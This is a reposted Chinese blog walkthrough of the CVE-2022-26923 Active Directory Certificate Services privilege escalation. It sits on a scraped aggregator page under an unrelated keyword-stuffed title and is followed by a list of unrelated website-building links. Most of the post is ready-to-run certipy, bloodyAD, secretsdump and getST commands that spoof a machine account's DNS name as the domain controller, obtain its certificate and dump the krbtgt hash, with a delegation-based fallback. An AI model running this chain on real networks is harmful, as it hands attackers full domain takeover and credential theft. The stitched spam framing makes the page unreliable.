当前位置: 首页 > news >正文

网站建设具备哪些技术人员下载字体如何在wordpress

网站建设具备哪些技术人员,下载字体如何在wordpress,wordpress默认缩略图,东莞网站建设制作厂CSDN自动博客文章迁移漏洞简介该漏洞允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中将权限提升到域管理员。在默认安装的ADCS里就启用了Machine模板。漏洞利用添加机器账户#xff0c;并将该机器账户dnsHostName指向DC[…CSDN自动博客文章迁移漏洞简介该漏洞允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中将权限提升到域管理员。在默认安装的ADCS里就启用了Machine模板。漏洞利用添加机器账户并将该机器账户dnsHostName指向DC[MAQ默认为10]:certipy account create -u zhangattack.cn -p 321.com -dc-ip 192.168.11.11 -user hacker -pass win123456 -dns dc.attack.cn用该机器账户向ADCS请求证书# TARGET为ADCS机器IPcertipy req -u hacker$attack.cn -p win123456 -target 192.168.11.12 -ca ATTACK-ADCS-CA -template Machine用申请的证书请求DC$的TGT:certipy auth -pfx dc.pfx -dc-ip 192.168.11.11用DC$的nthash去DCSync:secretsdump.py attack.cn/dc$192.168.11.11 -just-dc-user attack/krbtgt -hashes :8ddb967e3951a2601d76e489373bbd0e使用bloodyAD 攻击# 查询MAQ的属性python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes DCattack,DCcn ms-DS-MachineAccountQuota​python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes DCattack,DCcn ms-DS-MachineAccountQuota​# 新增计算机账号 python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 addComputer creme pass123​# 设置新增的机器账号的属性DNSHostName指向AD的属性值python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 setAttribute CNcremem,CNComputers,DCattack,DCcn dNSHostName [dc.attack.cn]​# 查看dNSHostName属性的指向​python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes DCattack,DCcn dNSHostName​# 运行Certipy生成机器证书可以看到DNSHostName 已经变成了dc.attack.cncertipy req attack.cn/cremem$:pass123dc.attack.cn -ca ATTACK-ADCS-CA -template Machine​# 用申请的证书请求DC$的TGTcertipy auth -pfx dc.pfx -dc-ip 192.168.11.11​# 用DC$的nthash去DCSyncsecretsdump.py attack.cn/dc$192.168.11.11 -just-dc-user attack/krbtgt -hashes :8ddb967e3951a2601d76e489373bbd0e​如果使用certipy请求TGT失败还可以设置RBCD来攻击openssl pkcs12 -in dc.pfx -out dc.pem -nodespython3 bloodyAD.py -c :dc.pem -u win$ --host 192.168.11.11 setRbcd hacker$ dc$getST.py attack.cn/hacker$:win123456 -spn LDAP/dc.attack.cn -impersonate administrator -dc-ip 192.168.11.11export KRB5CCNAMEadministrator.ccachesecretsdump.py -k dc.attack.cn -just-dc-user attack/krbtgt​转载请注明Adminxes Blog » ADCS攻击之CVE-2022–26923
http://www.dnsts.com.cn/news/230041.html

相关文章:

  • 旅游网站建设策划书范文大庆小程序制作
  • 网站推广的具体内容传媒网站
  • 旅游网站建设方法的探讨全屏式网站
  • 网站优化软件做淘宝客为什么要做网站
  • 万江东莞网站建设辽阳哪里做网站
  • WordPress网站小程序网站建设运营维护合同
  • 中英文网站模板重庆的网络优化公司
  • 网页设计与网站建设主要内容wordpress 公网贷款
  • 网站谷歌地图提交做阿里网站卖东西赚钱吗
  • 梅州新农村建设网站建设网站建设多少钱
  • 站外推广渠道有哪些做淘宝客要有网站吗
  • 做外贸最好的网站建设外贸平台公司
  • 网站建设大公司杭州家具网站建设方案
  • 网站有死链怎么处理大宗商品现货交易平台软件
  • 北京专业网站外包公司网站后台无法审核
  • 网站建设推广费计入什么科目修改wordpress后台地址
  • 成都网站建设 木木科技网页设计找工作
  • 怎么建立属于自己的网站网络建站工作室
  • 手机免费建站app什么是seo如何进行seo
  • 购物网站建设的思路nas可做网站服务器吗
  • 纯html5 网站做流量的网站
  • 中建设计集团网站青岛网站建设方案服务
  • 网站流量显示网站开发技术岗位职责
  • 深圳快速网站制作服务wordpress调用api
  • 重庆建设工程交易中心网站网站开发全包
  • 网站建设教程高清视频自己本地可以做网站服务器吗
  • 怎么样从头开始做网站酒泉网站建设
  • 自己电脑上做网站程序员一个月多少工资
  • js网站开发教程青岛建设大学招聘信息网站
  • 推荐做幻灯片搜图网站团购网站seo